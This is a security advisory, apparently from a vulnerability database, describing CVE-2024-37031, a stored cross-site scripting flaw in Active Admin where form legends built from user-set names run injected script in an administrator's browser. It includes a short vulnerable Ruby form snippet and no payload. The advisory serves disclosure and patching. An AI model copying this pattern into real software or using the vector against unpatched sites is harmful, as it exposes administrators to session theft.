CVE-2024-37031: activeadmin vulnerable to stored persistent cross-site scripting (XSS) in dynamic form legends
(updated )
Users settings their active admin form legends dynamically may be vulnerable to stored XSS, as long as its value can be injected directly by a malicious user.
For example:
- A public web application allows users to create entities with arbitrary names.
- Active Admin is used to administrate these entities through a private backend.
- The form to edit these entities in the private backend has the following shape (note the dynamic
namevalue dependent on an attribute of theresource):
form do |f|
f.inputs name: resource.name do
f.input :name
f.input :description
end
f.actions
end
Then a malicious user could create an entity with a payload that would get executed in the active admin administrator’s browser.
Both form blocks with an implicit or explicit name (i.e., both form resource.name or form name: resource.name would suffer from the problem), where the value of the name can be arbitrarily set by non admin users.
References
- github.com/activeadmin/activeadmin
- github.com/activeadmin/activeadmin/pull/8349
- github.com/activeadmin/activeadmin/releases/tag/v3.2.2
- github.com/activeadmin/activeadmin/security/advisories/GHSA-9mg6-x45v-hcfm
- github.com/advisories/GHSA-9mg6-x45v-hcfm
- github.com/rubysec/ruby-advisory-db/blob/master/gems/activeadmin/CVE-2024-37031.yml
- nvd.nist.gov/vuln/detail/CVE-2024-37031
- rubygems.org/gems/activeadmin/versions/3.2.2
Detect and mitigate CVE-2024-37031 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →